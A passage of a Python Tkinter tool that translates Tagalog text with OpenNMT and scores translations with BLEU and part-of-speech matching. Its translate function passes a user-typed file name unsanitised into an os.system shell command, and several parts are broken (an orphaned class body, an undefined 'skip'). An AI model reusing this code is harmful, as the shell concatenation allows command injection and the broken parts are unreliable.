by mistakes times the partial\n deduction = mistakes*partial\n #grossscore is the final score, which is the bleu score minus the deduction \n grossscore = netscore - deduction\n \n returnDictionary['grs'] = grossscore\n \n return returnDictionary\n\ndef compare_POS(referencetxt, candidatetxt):\n referencePOSlist = getPOS(referencetxt)\n candidatePOSlist = getPOS(candidatetxt)\n \n counter = 0\n correctcounter = 0\n candidateLength = len(candidatePOSlist)\n \n if(len(referencePOSlist)>candidateLength):\n while(len(referencePOSlist) > counter):\n try:\n if(candidatePOSlist[counter]==referencePOSlist[counter]):\n correctcounter+=1\n except:\n skip\n finally: \n counter+=1 \n \n else:\n while(candidateLength > counter):\n try:\n if(referencePOSlist[counter]==candidatePOSlist[counter]):\n correctcounter+=1\n except:\n skip\n finally:\n counter+=1 \n \n return f'{correctcounter} of {len(referencePOSlist)}'\n \n\n\n\n# class fr2(tk.Frame):\n def __init__(self, master):\n self.nlp = spacy.load('en_core_web_sm')\n \n self.counter=0\n \n self.ref_list = []\n with open('reference.txt',mode='r') as re:\n for line in re:\n self.ref_list.append(line)\n \n self.ca_list = []\n with open('candidate.txt',mode='r') as f:\n for line in f:\n self.ca_list.append(line)\n \n self.ref_being_evaluated = self.ref_list[self.counter]\n self.cand_being_evaluated = self.ca_list[self.counter]\n \n \n \n \n \n #reftxt = ' '.join([str(word) for word in pos_list])\n \n subframe = Frame(master, background=\"blue\")\n self.reflbl = Label(subframe, text = \"Reference Text\")\n self.reflbl.place(relx=0.5,anchor=N)\n self.reftxt = Label(subframe, text = self.ref_being_evaluated)\n self.reftxt.place(relx=0.5, rely=0.5,anchor='center')\n subframe.pack(expand = True, fill = BOTH, side=LEFT)\n \n \n \n \n \n \n subframe2 = ttk.Frame(master, background=\"red\")\n self.candlbl = ttk.Label(subframe2, text=\"Candidate Text\")\n self.candlbl.place(relx=0.5,anchor=N)\n self.candtxt = ttk.Label(subframe2, text= self.cand_being_evaluated)\n self.candtxt.place(relx=0.5, rely=0.5,anchor=CENTER) \n \n bleuscore = sentence_bleu(list(self.ref_being_evaluated), list(self.cand_being_evaluated), weights=(1, 0, 0, 0))\n \n dictOutput = structure_evaluation(self.nlp(self.ref_being_evaluated),self.nlp(self.cand_being_evaluated), bleuscore)\n \n self.bleu_lbl = ttk.Label(subframe2, text = 'standard bleu score: ' + str(bleuscore))\n self.bleu_lbl.place(relx=0.5, 
rely=0.6,anchor=CENTER)\n self.gross_lbl = ttk.Label(subframe2, text = 'Structure sensitive Bleu score: ' + str(dictOutput['grs']))\n self.gross_lbl.place(relx=0.5, rely=0.7, anchor = CENTER)\n self.corr_lbl = ttk.Label(subframe2, text = f'Correctly placed POS tags:' + str(dictOutput['correctly placed tags']))\n self.corr_lbl.place(relx=0.5, rely=0.8, anchor = CENTER)\n self.compare_lbl = ttk.Label(subframe2, text = f'Number of correctly placed tags: {compare_POS(self.nlp(self.ref_being_evaluated), self.nlp(self.cand_being_evaluated))}')\n self.compare_lbl.place(relx=0.5, rely=0.9, anchor = CENTER)\n subframe2.pack(expand=True, fill=BOTH, side=LEFT)\n \n self.btn_next = ttk.Button(subframe,text=\"Next\",command =self.updateTexts)\n self.btn_next.place(relx=0.5, rely=0.8, anchor = CENTER)\n \n def updateTexts(self):\n self.ref_being_evaluated = self.ref_list[self.counter]\n self.cand_being_evaluated = self.ca_list[self.counter]\n self.reftxt[\"text\"] = self.ref_being_evaluated\n self.candtxt[\"text\"] = self.cand_being_evaluated\n internal_bleu_score = sentence_bleu(list(self.ref_being_evaluated), list(self.cand_being_evaluated), weights=(1, 0, 0, 0))\n self.bleu_lbl[\"text\"] = 'standard bleu score: ' + str(internal_bleu_score)\n internalDictOutput = dictOutput = structure_evaluation(self.nlp(self.ref_being_evaluated),self.nlp(self.cand_being_evaluated), internal_bleu_score)\n self.gross_lbl[\"text\"] = 'Structure sensitive Bleu score: ' + str(internalDictOutput['grs'])\n self.corr_lbl[\"text\"] = f'Correctly placed POS tags:' + str(internalDictOutput['correctly placed tags'])\n self.compare_lbl[\"text\"] = f'Number of correctly placed tags: {compare_POS(self.nlp(self.ref_being_evaluated), self.nlp(self.cand_being_evaluated))}'\n self.counter+=1\n \n # self.c+=1 \n # print(self.c)\n # reftxt = re_list[self.c]\n # candtxt = ca_list[self.c]\n # self.subject.config(text=reftxt)\n # self.message.config(text=candtxt)\n \nclass Display:\n def __init__(self):\n self.root = tk.Tk()\n \n self.root.geometry('900x600')\n self.root.resizable(False,False)\n self.root.title(\"Structure Sensitive BLEU\")\n \n self.tabControl = ttk.Notebook(self.root)\n \n \n ##1ST TAB\n ##TRANSLATION \n ##STAGE\n \n self.tab1 = ttk.Frame(self.tabControl)\n \n #self.tab1.columnconfigure(0, weight=1)\n #self.tab1.columnconfigure(1, weight=2)\n \n self.tabControl.add(self.tab1, text=\"Translation\")\n \n self.tab1origLbl = ttk.Label(self.tab1, text = \"Original Text\")\n self.tab1origLbl.grid(row=0,column=0, padx=20, pady=20)\n \n self.tab2transLbl = ttk.Label(self.tab1, text = \"Translated Text\")\n self.tab2transLbl.grid(row=0,column=1)\n \n self.text_area = st.ScrolledText(self.tab1,\n width = 50, \n height = 24, \n font = (\"Times New Roman\",\n 12))\n # self.text_area.grid(row = 0, column = 0, rowspan= 3)\n self.text_area.grid(row = 1, column = 0, padx=20)\n self.text_area.configure(state ='disabled')\n \n self.translated_text_area = st.ScrolledText(self.tab1, width = 50, height = 24, font = (\"Times New Roman\", 12))\n self.translated_text_area.grid(row = 1, column = 1)\n self.translated_text_area.configure(state='disabled')\n \n def vocab_clicked(func,samplesize):\n Thread(target=run_vocab_thread,args=(func,samplesize)).start()\n def onmtVocab(samplesize):\n os.chdir('Collab files')\n os.system(r'onmt_build_vocab -config en_tl.yaml -n_sample ' + str(samplesize))\n # textwidget.configure(state='normal')\n # with open('vocabInfo.txt','r') as file:\n # t = file.read()\n \n # time.sleep(5)\n # 
textwidget.insert(tk.INSERT, t)\n \n # textwidget.configure(state='disabled')\n \n # os.chdir('Collab files')\n # returned_value = os.system(r'cmd /k onmt_build_vocab -config en_tl.yaml -n_sample 10000')\n # print('returned value: ', returned_value)\n \n def run_vocab_thread(func,samplesize):\n popup = tk.Toplevel()\n tk.Label(popup, text=\"Building the vocabulary\").grid(row=0,column=0)\n\n processing_bar = ttk.Progressbar(popup, orient='horizontal', mode='indeterminate')\n processing_bar.grid(row=1,column=0)\n \n processing_bar.start(interval=10)\n print('vocab', 'started')\n func(samplesize)\n processing_bar.stop()\n print('vocab', 'stopped')\n \n popup.destroy()\n \n def onmtTrain(): \n try:\n #ensure_command()\n os.system(r'onmt_train -config en_tl.yaml 1>opennmt.log 2>&1')\n except AttributeError:\n tk.messagebox.showerror(\"Attribute error\", \"Incompatible system requirements\")\n ##returned_value = os.system(r'cmd /k onmt_train -config en_tl.yaml')\n ##print('returned value: ', returned_value)\n \n def train_clicked(func):\n Thread(target=run_train_thread,args=[func]).start()\n \n def run_train_thread(func):\n popup = tk.Toplevel()\n tk.Label(popup, text=\"Training data\").grid(row=0,column=0)\n\n processing_bar = ttk.Progressbar(popup, orient='horizontal', mode='indeterminate')\n processing_bar.grid(row=1,column=0)\n \n processing_bar.start(interval=10)\n print('train', 'started')\n func()\n processing_bar.stop()\n print('train', 'stopped')\n \n popup.destroy()\n \n self.modelPtFile = None\n self.origTlFile = None\n \n def updTrans(textwidget):\n tk.messagebox.showinfo(\"Upload file\", \"Select a model pytorch file\")\n modelDir = fd.askopenfilename(filetypes=[(\"Pytorch files\", \"*.pt\")])\n self.modelPtFile = os.path.split(modelDir)[1]\n \n tk.messagebox.showinfo(\"Upload file\", \"Select a text file written in Tagalog\")\n origDir = fd.askopenfilename(filetypes=[(\"Tagalog text files\", \"*.tl\")])\n self.origTlFile = os.path.split(origDir)[1]\n \n with open(self.origTlFile,'r') as file:\n origLines = file.read()\n \n textwidget.configure(state='normal')\n textwidget.delete('1.0',tk.END)\n textwidget.insert(tk.INSERT, origLines)\n textwidget.configure(state='disabled')\n \n if self.modelPtFile and self.origTlFile:\n self.btn_translate[\"state\"] = tk.NORMAL\n \n def onmtTranslate(pytorchFile,tlFile,outputFilename):\n os.system(r'onmt_translate -model ' + pytorchFile + ' -src ' + tlFile + ' -output ' + outputFilename + '.txt -verbose')\n \n def run_translate_thread(name, func,pytorchFile,tlFile,outputFilename):\n popup = tk.Toplevel()\n tk.Label(popup, text=\"File being translated\").grid(row=0,column=0)\n\n processing_bar = ttk.Progressbar(popup, orient='horizontal', mode='indeterminate')\n processing_bar.grid(row=1,column=0)\n \n processing_bar.start(interval=10)\n print(name, 'started')\n func(pytorchFile,tlFile,outputFilename)\n processing_bar.stop()\n print(name, 'stopped')\n \n popup.destroy()\n \n with open(outputFilename + '.txt','r') as file:\n transLines = file.read()\n \n transLines = transLines.replace('', 'unknown')\n \n with open(outputFilename + '.txt','w') as file:\n file.write(transLines)\n \n self.translated_text_area.configure(state='normal')\n self.translated_text_area.delete('1.0',tk.END)\n self.translated_text_area.insert(tk.INSERT, transLines)\n self.translated_text_area.configure(state='disabled')\n \n def run_thread(name, func,pytorchFile,tlFile,outputFilename):\n Thread(target=run_translate_thread, args=(name, 
func,pytorchFile,tlFile,outputFilename)).start()\n \n def translate_clicked(textwidget,pytorchFile,tlFile): \n outputFilename = AS('File name', 'What would you like to name your output file?') \n \n outputFilename = outputFilename.replace(' ','-')\n if outputFilename == '':\n tk.messagebox.showerror(\"No name entered\", \"No name entered. Please try again.\")\n else:\n \n run_thread('translate', onmtTranslate, pytorchFile,tlFile,outputFilename)\n \n \n #os.system(r'onmt_translate -model ' + pytorchFile + ' -src ' + tlFile + ' -output ' + outputFilename + '.txt -verbose')\n \n \n \n self.button_tab1_Fr = tk.Frame(self.tab1)\n self.button_tab1_Fr.grid(row=2,column=1, pady=20,sticky=tk.E)\n \n self.btn_upload_tab1 = ttk.Button(self.button_tab1_Fr, text = \"Upload\", command=lambda:updTrans(self.text_area))\n self.btn_upload_tab1.grid(row=0,column=2)\n self.btn_translate = ttk.Button(self.button_tab1_Fr, text=\"Translate\", command=lambda: translate_clicked(self.translated_text_area,self.modelPtFile,self.origTlFile))\n self.btn_translate.grid(row=0,column=3)\n self.btn_translate[\"state\"] = tk.DISABLED\n \n # self.btn_vocab = ttk.Button(self.button_tab1_Fr,text=\"Build Vocab\",command=lambda: vocab_clicked(onmtVocab,10000))\n # self.btn_vocab.grid(row = 0, column= 0)\n \n # self.btn_train = ttk.Button(self.button_tab1_Fr, text=\"Train\", command=lambda: train_clicked(onmtTrain))\n # self.btn_train.grid(row=0, column = 1)\n \n def ensure_command():\n time.sleep(99999)\n ##2ND TAB\n ##FOR EVALUATION\n ##STAGE\n ##\n ##\n ##\n \n \n self.tab2 = ttk.Frame(self.tabControl)\n self.tabControl.add(self.tab2, text=\"Evaluation\")\n \n self.nlp = spacy.load('en_core_web_sm')\n \n self.tab2.columnconfigure(0, weight = 2)\n self.tab2.columnconfigure(1, weight = 2)\n self.tab2.columnconfigure(2, weight = 1)\n \n \n \n #graph\n # self.f = Figure(figsize=(3,3),dpi=85)\n \n # a = self.f.add_subplot(111)\n # a.plot([1,2,3,4,5],[0.89,0.56,0.56,0.22,0.17],label=\"bleu Score\")\n # a.plot([1,2,3,4,5],[0.1,0.56,0.43,0.16,0.1],label = \"gross Score\")\n # a.legend()\n # canvas = FigureCanvasTkAgg(self.f,self.tab2)\n # canvas.draw()\n # canvas.get_tk_widget().grid(row=0,column = 1)\n \n ##labels\n \n #self.origLbl = ttk.Label(self.tab2, text = \"Original Text\")\n #self.origLbl.grid(row=1,column=0)\n \n self.reflbl = ttk.Label(self.tab2, text = \"Reference Text\")\n self.reflbl.grid(row=1,column=0)\n \n self.caLbl = ttk.Label(self.tab2, text = \"Candidate Text\")\n self.caLbl.grid(row=1, column=1)\n \n ##text areas\n #self.origTextarea = st.ScrolledText(self.tab2, width = 20, height = 10, font = (\"Times New Roman\", 12))\n #self.origTextarea.grid(row = 2, column = 0, rowspan=4)\n \n self.refTextarea = st.ScrolledText(self.tab2, font = (\"Times New Roman\",7))\n self.refTextarea.grid(row=2,column=0, rowspan=4)\n \n self.calTextarea = st.ScrolledText(self.tab2, font = (\"Times New Roman\",7))\n self.calTextarea.grid(row=2,column=1, rowspan=4)\n \n self.logFr = tk.Frame(self.tab2, height = 317, width = 580)\n self.logFr.grid(row=0, column = 0, sticky=tk.W)\n ##eval data labels\n self.numOfLines = 0\n self.lineCounter = 1\n \n standardtab2LabelFont = 'Times New Roman',11\n self.linesLbl = ttk.Label(self.logFr, text = 'Line ? 
of ?', font=standardtab2LabelFont)\n self.linesLbl.grid(row = 0, column = 0, sticky=tk.W)\n self.bleu_lbl = ttk.Label(self.logFr, text = 'Standard bleu score: ', font=standardtab2LabelFont)\n self.bleu_lbl.grid(row = 1, column = 0, sticky=tk.W)\n self.avgBleu_lbl = ttk.Label(self.logFr, text = 'Average bleu score so far: ', font=standardtab2LabelFont)\n self.avgBleu_lbl.grid(row = 2, column=0,sticky=tk.W)\n self.gross_lbl = ttk.Label(self.logFr, text = 'Structure sensitive Bleu score: ', font=standardtab2LabelFont)\n self.gross_lbl.grid(row = 3, column = 0, sticky=tk.W)\n self.avgStruct_lbl = ttk.Label(self.logFr,text = 'Average Structure sensitive Bleu score so far: ', font=standardtab2LabelFont)\n self.avgStruct_lbl.grid(row=4,column=0,sticky=tk.W)\n self.corr_lbl = ttk.Label(self.logFr, text = f'Correctly placed POS tags:', font=standardtab2LabelFont)\n self.corr_lbl.grid(row = 5, column= 0, sticky=tk.W )\n self.compare_lbl = ttk.Label(self.logFr, text = f'Number of correctly placed tags:', font=standardtab2LabelFont)\n self.compare_lbl.grid(row = 6, column =0, sticky=tk.W)\n \n \n \n ##button frame\n self.buttonFr = tk.Frame(self.tab2)\n self.buttonFr.grid(row=1,column=2,rowspan=5,sticky=tk.W)\n \n \n \n \n ##choose text file buttons\n self.origLineList = []\n def chooseOrigText(textwidget):\n origDir = fd.askopenfilename()\n origFileName = os.path.split(origDir)[1]\n \n with open(origFileName,'r') as origFileLines:\n for line in origFileLines:\n self.origLineList.append(line)\n \n textwidget.configure(state='normal')\n textwidget.insert(tk.INSERT,self.origLineList[0])\n textwidget.configure(state='disabled')\n \n #self.origBtn = ttk.Button(self.tab2, text=\"Choose Original text file\", command=lambda: chooseOrigText(self.origTextarea))\n #self.origBtn.grid(row=6, column = 0)\n \n self.refLineList = []\n def chooseRefText(textwidget):\n refDir = fd.askopenfilename()\n refFileName = os.path.split(refDir)[1]\n \n with open(refFileName, 'r') as reFileLines:\n for line in reFileLines:\n self.refLineList.append(line)\n \n textwidget.configure(state='normal')\n textwidget.insert(tk.INSERT,self.refLineList[0])\n textwidget.configure(state='disabled')\n \n # self.refBtn = ttk.Button(self.tab2, text=\"Choose Reference text file\", command=lambda: chooseRefText(self.refTextarea))\n # self.refBtn.grid(row=6, column = 1)\n \n self.refFileName = ''\n self.candFileName = ''\n \n self.xCoord = []\n self.xCoordCounter = 1\n self.bleuY = []\n self.grossY = []\n \n self.candLineList = []\n self.correctlyPlacedPOSY = []\n \n def Upload(textwidgets):\n self.refLineList = []\n self.xCoord = []\n self.xCoordCounter = 1\n self.bleuY = []\n self.grossY = []\n self.candLineList = []\n self.lineCounter = 1\n \n tk.messagebox.showinfo(\"Upload file\", \"Select a reference text file\")\n \n refDir = fd.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n self.refFileName = os.path.split(refDir)[1]\n \n with open(self.refFileName, 'r') as reFileLines:\n c = 0\n for line in reFileLines:\n self.refLineList.append(line)\n c+=1\n self.numOfLines = c\n \n textwidgets[0].configure(state='normal')\n textwidgets[0].delete(\"1.0\",\"end\")\n refPOS = str(getPOS(self.nlp(self.refLineList[0])))\n textwidgets[0].insert(tk.INSERT,self.refLineList[0] + \"\\n \" + refPOS)\n textwidgets[0].configure(state='disabled')\n \n tk.messagebox.showinfo(\"Upload file\", \"Select a candidate text file\")\n \n candDir = fd.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n self.candFileName = os.path.split(candDir)[1]\n \n 
with open(self.candFileName,'r') as candFileLines:\n for line in candFileLines:\n self.candLineList.append(line)\n\n textwidgets[1].configure(state='normal')\n textwidgets[1].delete(\"1.0\",\"end\")\n candPOS = str(getPOS(self.nlp(self.candLineList[0])))\n textwidgets[1].insert(tk.INSERT,self.candLineList[0] + \"\\n \" + candPOS)\n textwidgets[1].configure(state='disabled')\n \n counterLocal = 0\n while counterLocal < len(self.refLineList):\n bleuSc = sentence_bleu(list(self.refLineList[counterLocal]),list(self.candLineList[counterLocal]), weights=(1,0,0,0))\n self.bleuY.append(bleuSc)\n grossSc = structure_evaluation(self.nlp(self.refLineList[counterLocal]),self.nlp(self.candLineList[counterLocal]),bleuSc)\n self.grossY.append(grossSc['grs'])\n self.correctlyPlacedPOSY.append(grossSc['correctly placed tags'])\n self.xCoord.append(self.xCoordCounter)\n self.xCoordCounter+=1\n counterLocal+=1\n \n format_bleuSc = \"{:.2f}\".format(self.bleuY[0])\n format_grossSc = \"{:.2f}\".format(self.grossY[0])\n \n correctlyPOSstr = slicePersonal(self.correctlyPlacedPOSY[0]) \n\n updateEvalLabels(1,str(self.numOfLines),str(format_bleuSc),str(format_bleuSc),str(format_grossSc),str(format_grossSc),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[0]),self.nlp(self.candLineList[0])))\n self.evalBtn[\"state\"] = tk.NORMAL\n self.lastBtn[\"state\"] = tk.NORMAL\n self.prevBtn[\"state\"] = tk.NORMAL\n \n # a = self.f.add_subplot(111)\n # a.plot(self.xCoord, self.bleuY, label = \"bleu Score\")\n # a.plot(self.xCoord, self.grossY, label = \"gross Score\")\n # a.legend()\n \n self.candBtn = ttk.Button(self.buttonFr, text=\"Upload\", command=lambda: Upload([self.refTextarea, self.calTextarea]))\n self.candBtn.grid(row=0, column = 0)\n \n \n \n self.counter = 0\n \n ##eval buttons\n \n def update_line(hl, new_data):\n hl.set_xdata(numpy.append(hl.get_xdata(), new_data))\n hl.set_ydata(numpy.append(hl.get_ydata(), new_data))\n plt.draw()\n \n def prevEval():\n try:\n self.lineCounter-=1\n self.counter-=1\n self.refTextarea.configure(state='normal')\n self.refTextarea.delete('1.0',tk.END)\n refPOS = str(getPOS(self.nlp(self.refLineList[self.counter])))\n self.refTextarea.insert(tk.INSERT,self.refLineList[self.counter] + \"\\n\" + refPOS)\n self.refTextarea.configure(state='disable')\n \n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n candPOS = str(getPOS(self.nlp(self.candLineList[self.counter])))\n self.calTextarea.insert(tk.INSERT,self.candLineList[self.counter] + \"\\n\" + candPOS)\n self.calTextarea.configure(state='disabled')\n \n format_bleuSc = \"{:.2f}\".format(self.bleuY[self.counter])\n avgBleu = \"{:.2f}\".format(sum(self.bleuY[:self.lineCounter])/self.lineCounter) \n \n format_grossSc = \"{:.2f}\".format(self.grossY[self.counter])\n avgStructBleu = \"{:.2f}\".format(sum(self.grossY[:self.lineCounter])/self.lineCounter)\n \n correctlyPOSstr = slicePersonal(self.correctlyPlacedPOSY[self.counter])\n \n \n updateEvalLabels(str(self.lineCounter),str(self.numOfLines),str(format_bleuSc),str(avgBleu),str(format_grossSc),str(avgStructBleu),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[self.counter]),self.nlp(self.candLineList[self.counter])))\n showGraph()\n \n except IndexError:\n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n self.calTextarea.configure(state='disable')\n tk.messagebox.showinfo(\"information\", \"Reached end of text file\")\n \n self.prevBtn = ttk.Button(self.buttonFr, text = \"Previous\", command=lambda: 
prevEval())\n self.prevBtn[\"state\"] = tk.DISABLED\n self.prevBtn.grid(row=1,column = 0)\n def nextEval():\n try:\n self.lineCounter+=1\n self.counter+=1\n self.refTextarea.configure(state='normal')\n self.refTextarea.delete('1.0',tk.END)\n refPOS = str(getPOS(self.nlp(self.refLineList[self.counter])))\n self.refTextarea.insert(tk.INSERT,self.refLineList[self.counter] + \"\\n\" + refPOS)\n self.refTextarea.configure(state='disable')\n \n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n candPOS = str(getPOS(self.nlp(self.candLineList[self.counter])))\n self.calTextarea.insert(tk.INSERT,self.candLineList[self.counter] + \"\\n\" + candPOS)\n self.calTextarea.configure(state='disabled')\n \n format_bleuSc = \"{:.2f}\".format(self.bleuY[self.counter])\n avgBleu = \"{:.2f}\".format(sum(self.bleuY[:self.lineCounter])/self.lineCounter) \n \n format_grossSc = \"{:.2f}\".format(self.grossY[self.counter])\n avgStructBleu = \"{:.2f}\".format(sum(self.grossY[:self.lineCounter])/self.lineCounter)\n \n correctlyPOSstr = slicePersonal(self.correctlyPlacedPOSY[self.counter])\n \n \n updateEvalLabels(str(self.lineCounter),str(self.numOfLines),str(format_bleuSc),str(avgBleu),str(format_grossSc),str(avgStructBleu),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[self.counter]),self.nlp(self.candLineList[self.counter])))\n showGraph()\n except IndexError:\n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n self.calTextarea.configure(state='disable')\n tk.messagebox.showinfo(\"information\", \"Reached end of text file\")\n \n \n self.evalBtn = ttk.Button(self.buttonFr, text = \"Next\", command=lambda: nextEval())\n self.evalBtn[\"state\"] = tk.DISABLED\n self.evalBtn.grid(row=2,column = 0)\n \n \n def skipLines():\n try:\n lineCounter = 0\n bleuScoresList = []\n structBleuScoresList = []\n \n AvgBleu = 0\n AvgStructBleu = 0\n \n for i in range(len(self.refLineList)):\n bleuSc = sentence_bleu(list(self.refLineList[lineCounter]), list(self.candLineList[lineCounter]), weights=(1, 0, 0, 0))\n bleuScoresList.append(bleuSc)\n grossSc = structure_evaluation(self.nlp(self.refLineList[lineCounter]), self.nlp(self.candLineList[lineCounter]),bleuSc)\n structBleuScoresList.append(grossSc['grs'])\n \n lineCounter+=1\n \n AvgBleu = sum(bleuScoresList)/len(bleuScoresList)\n AvgBleu = \"{:.2f}\".format(AvgBleu)\n AvgStructBleu = sum(structBleuScoresList)/len(structBleuScoresList)\n AvgStructBleu = \"{:.2f}\".format(AvgStructBleu)\n \n tk.messagebox.showinfo(\"Averages\", f\"Bleu: {AvgBleu} \\nStructure Sensitive Bleu: {AvgStructBleu}\")\n except FileNotFoundError:\n tk.messagebox.showerror(\"Error\",\"No files uploaded\") \n \n #self.skipBtn = ttk.Button(self.buttonFr, text = \"Show average\", command=lambda: skipLines())\n #self.skipBtn.grid(row=2,column=0)\n \n def skipToLast():\n self.lineCounter = len(self.refLineList)\n self.counter = self.lineCounter - 1\n #Should counter also update? 
\n self.refTextarea.configure(state='normal')\n self.refTextarea.delete('1.0',tk.END)\n refPOS = str(getPOS(self.nlp(self.refLineList[-1])))\n self.refTextarea.insert(tk.INSERT,self.refLineList[-1] + \"\\n\" + refPOS)\n self.refTextarea.configure(state='disable')\n \n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n candPOS = str(getPOS(self.nlp(self.candLineList[-1])))\n self.calTextarea.insert(tk.INSERT,self.candLineList[-1] + \"\\n\" + candPOS)\n self.calTextarea.configure(state='disabled')\n \n bleuSc = sentence_bleu(list(self.refLineList[-1]), list(self.candLineList[-1]), weights=(1, 0, 0, 0))\n format_bleuSc = \"{:.2f}\".format(bleuSc)\n \n avgBleu = \"{:.2f}\".format(sum(self.bleuY)/len(self.bleuY)) \n \n grossSc = structure_evaluation(self.nlp(self.refLineList[-1]), self.nlp(self.candLineList[-1]),bleuSc)\n format_grossSc = \"{:.2f}\".format(grossSc['grs'])\n \n \n avgStructBleu = \"{:.2f}\".format(sum(self.grossY)/len(self.grossY))\n \n \n correctlyPOSstr = slicePersonal(grossSc['correctly placed tags'])\n \n updateEvalLabels(str(self.numOfLines),str(self.numOfLines),str(format_bleuSc),str(avgBleu),str(format_grossSc),str(avgStructBleu),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[-1]),self.nlp(self.candLineList[-1])))\n showGraph()\n \n self.lastBtn = ttk.Button(self.buttonFr, text=\"Skip to Last\", command = lambda: skipToLast())\n self.lastBtn[\"state\"] = tk.DISABLED\n self.lastBtn.grid(row=3,column=0)\n \n \n ##self.reftxt = ttk.Label(self.tab2, text = self.ref_being_evaluated)\n ##self.reftxt.place(relx=0.5, rely=0.5,anchor='center')\n \n def updateEvalLabels(line_number,total_lines,std_bleu_score,avg_std_bleu,struct_bleu_score,avg_struct_bleu,correct_lbls,compared_lbls):\n self.linesLbl[\"text\"] = f\"Line {line_number} of {total_lines}\"\n self.bleu_lbl[\"text\"] = f\"Standard bleu score: {std_bleu_score}\"\n self.avgBleu_lbl[\"text\"] = f\"Average bleu score so far: {avg_std_bleu}\"\n self.gross_lbl[\"text\"] = f\"Structure sensitive Bleu score: {struct_bleu_score}\"\n self.avgStruct_lbl[\"text\"] = f\"Average Structure sensitive Bleu score so far: {avg_struct_bleu}\"\n self.corr_lbl[\"text\"] = f\"Correctly placed POS tags: {correct_lbls}\"\n self.compare_lbl[\"text\"] = f\"Number of correctly placed tags: {compared_lbls}\"\n \n \n def showGraph():\n f = Figure(figsize=(3,3),dpi=85)\n a = f.add_subplot(111)\n a.plot(self.xCoord[:self.lineCounter], self.bleuY[:self.lineCounter], label = \"bleu Score\")\n a.plot(self.xCoord[:self.lineCounter], self.grossY[:self.lineCounter], label = \"SS Bleu Score\")\n a.legend()\n \n canvas = FigureCanvasTkAgg(f,self.tab2)\n canvas.draw()\n canvas.get_tk_widget().grid(row=0,column = 1)\n \n \n \n self.tabControl.pack(expand=1, fill=\"both\")\n \n \n ##3rd tab\n ##For instructions\n ##\n ##\n ##\n \n self.tab3 = ttk.Frame(self.tabControl)\n self.tabControl.add(self.tab3, text=\"Instructions\")\n \n standardtab3LblFont = 'Times New Roman', 12\n \n remindLbl = ttk.Label(self.tab3, text = 'Reminder: Make sure that a translated text file and reference text file are both already present', font = standardtab3LblFont)\n remindLbl.grid(row = 0, column = 0, sticky=tk.W)\n \n remindLbl2 = ttk.Label(self.tab3, text = ' before proceeding to the evaluation phase', font = standardtab3LblFont)\n remindLbl2.grid(row = 1, column = 0, sticky=tk.W)\n \n transInstructionLbl = ttk.Label(self.tab3, text = 'Translation phase', font = standardtab3LblFont)\n transInstructionLbl.grid(row = 2, column = 0, sticky=tk.W)\n 
\n step1Lbl = ttk.Label(self.tab3, text = 'Step 1: Click the translate button', font = standardtab3LblFont)\n step1Lbl.grid(row = 3, column = 0, sticky=tk.W)\n \n step2Lbl = ttk.Label(self.tab3, text = 'Step 2: You will be prompted to select a model. Only .pt (PyTorch) files are accepted', font = standardtab3LblFont)\n step2Lbl.grid(row = 4, column = 0, sticky=tk.W)\n \n step3Lbl = ttk.Label(self.tab3, text = 'Step 3: Next, select an input text file. The file should be in Filipino language. Only .txt files are accepted', font = standardtab3LblFont)\n step3Lbl.grid(row = 5, column = 0, sticky=tk.W)\n \n step4Lbl = ttk.Label(self.tab3, text = 'Step 4: Enter the name of the output file', font = standardtab3LblFont)\n step4Lbl.grid(row = 6, column = 0, sticky=tk.W)\n \n spaceLbl = ttk.Label(self.tab3, text = ' ')\n spaceLbl.grid(row = 7, column = 0, sticky = tk.W)\n \n evalInstructionLbl = ttk.Label(self.tab3, text = 'Evaluation phase', font = standardtab3LblFont)\n evalInstructionLbl.grid(row = 8, column = 0, sticky = tk.W)\n \n stepE1Lbl = ttk.Label(self.tab3, text = 'Step 1: Click the upload button', font = standardtab3LblFont)\n stepE1Lbl.grid(row = 9, column = 0, sticky = tk.W)\n \n stepE2Lbl = ttk.Label(self.tab3, text = 'Step 2: Select the reference text file. Only .txt files are accepted', font = standardtab3LblFont)\n stepE2Lbl.grid(row = 10, column = 0, sticky = tk.W)\n \n stepE3Lbl = ttk.Label(self.tab3, text = 'Step 3: Select the candidate text file. Only .txt files are accepted', font = standardtab3LblFont)\n stepE3Lbl.grid(row = 11, column = 0, sticky = tk.W)\n \n stepE4Lbl = ttk.Label(self.tab3, text = 'Step 4: The scores along with other information are now displayed. Click the next button to \\nevaluate the next line until the end of the text file', font = standardtab3LblFont)\n stepE4Lbl.grid(row = 12, column = 0, sticky = tk.W)\n \n ##4th tab\n ##POS tags list\n \n self.tab4 = ttk.Frame(self.tabControl)\n self.tabControl.add(self.tab4, text=\"POS labels\")\n \n self.posLabelFr = tk.Frame(self.tab4)\n self.posLabelFr.grid(row=0,column=0,padx=20,pady=20)\n \n posHeaderLbl = ttk.Label(self.posLabelFr, text = 'POS', font = standardtab3LblFont)\n posHeaderLbl.grid(row = 0, column = 0)\n \n descHeaderLbl = ttk.Label(self.posLabelFr,text = 'DESCRIPTION', font = standardtab3LblFont)\n descHeaderLbl.grid(row=0,column=1)\n \n exHeaderLbl = ttk.Label(self.posLabelFr,text = 'EXAMPLES', font = standardtab3LblFont)\n exHeaderLbl.grid(row=0,column=2)\n \n tags_list = ['ADJ','ADP','ADV','AUX','CONJ','CCONJ','DET','INTJ','NOUN','NUM','PART','PRON','PROPN','PUNCT','SCONJ','SYM','VERB','X','SPACE']\n desc_list = ['adjective','adposition','adverb','auxiliary','conjunction','coordinating conjunction','determiner','interjection','noun','numeral','particle','pronoun','proper noun','punctuation','subordinating conjunction','symbol','verb','other','space']\n examples_list = ['*big, old, green','*in, to, during*','*very, where, there*'\n ,'\t*is, has (done), will (do), should (do)*','\t*and, or, but*','*and, or, but*','*a, an, the*','*psst, ouch, bravo, hello*','\t*girl, cat, tree, air, beauty*','*1, 2017, one, seventy-seven, IV, MMXIV*'\n ,'*’s, not,*','\t*I, you, he, she, myself, themselves, 